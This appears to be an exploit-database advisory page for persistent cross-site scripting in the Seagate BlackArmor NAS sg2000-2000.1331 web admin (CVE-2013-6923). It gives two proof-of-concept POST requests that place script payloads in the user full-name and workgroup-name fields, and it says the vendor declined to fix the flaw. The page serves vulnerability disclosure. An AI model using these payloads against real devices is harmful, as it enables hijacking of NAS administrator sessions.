Lucene search
Jeroen-ITNerdbox1337DAY-ID-21732HistoryJan 06, 2014 - 12:00 a.m.
Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross Site Scripting Vulnerabilities
2014-01-0600:00:00
Jeroen-ITNerdbox
0day.today
18
0.002 Low
EPSS
Percentile
60.5%
Exploit for hardware platform in category web applications
# When adding a user to the device, it is possible to enter a full name.
This input field does not
# sanitize its input and it is possible to enter any payload which will get
executed upon reload.
#
# The workgroup configuration is also vulnerable to persistent XSS. The Work
Group name input
# field does not sanitize its input.
#
# This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed.
#
## Proof of Concept #1:
#
# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en
# Parameters:
#
# index = 2
# fullname = <script>alert(1);</script>
# submit = Submit
#
#
## Proof of Concept #2:
#
# POST: http(s)://<url |
ip>/admin/network_workgroup_domain.php?lang=en&gi=n003
# Parameter:
#
# workname = "><input onmouseover=prompt(1) >
# 0day.today [2018-03-19] #Related
packetstorm
packetstorm
Seagate BlackArmor NAS sg2000-2000.1331 Cross Site Scripting
2014-01-06 00:00:00
seebug
seebug
Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross Site Scripting Vulnerabilities
2014-07-01 00:00:00
Seagate BlackArmor NAS sg2000-2000.1331跨站脚本漏洞
2014-01-06 00:00:00
exploitpack
exploitpack
prion
prion
Cross site scripting
2014-01-09 18:55:00
cvelist
cvelist
CVE-2013-6923
2014-01-09 15:00:00
cve
cve
CVE-2013-6923
2014-01-09 18:55:08
nvd
nvd
CVE-2013-6923
2014-01-09 18:55:08
exploitdb
exploitdb
openvas
openvas
Seagate BlackArmor NAS Multiple Vulnerabilities
2014-01-06 00:00:00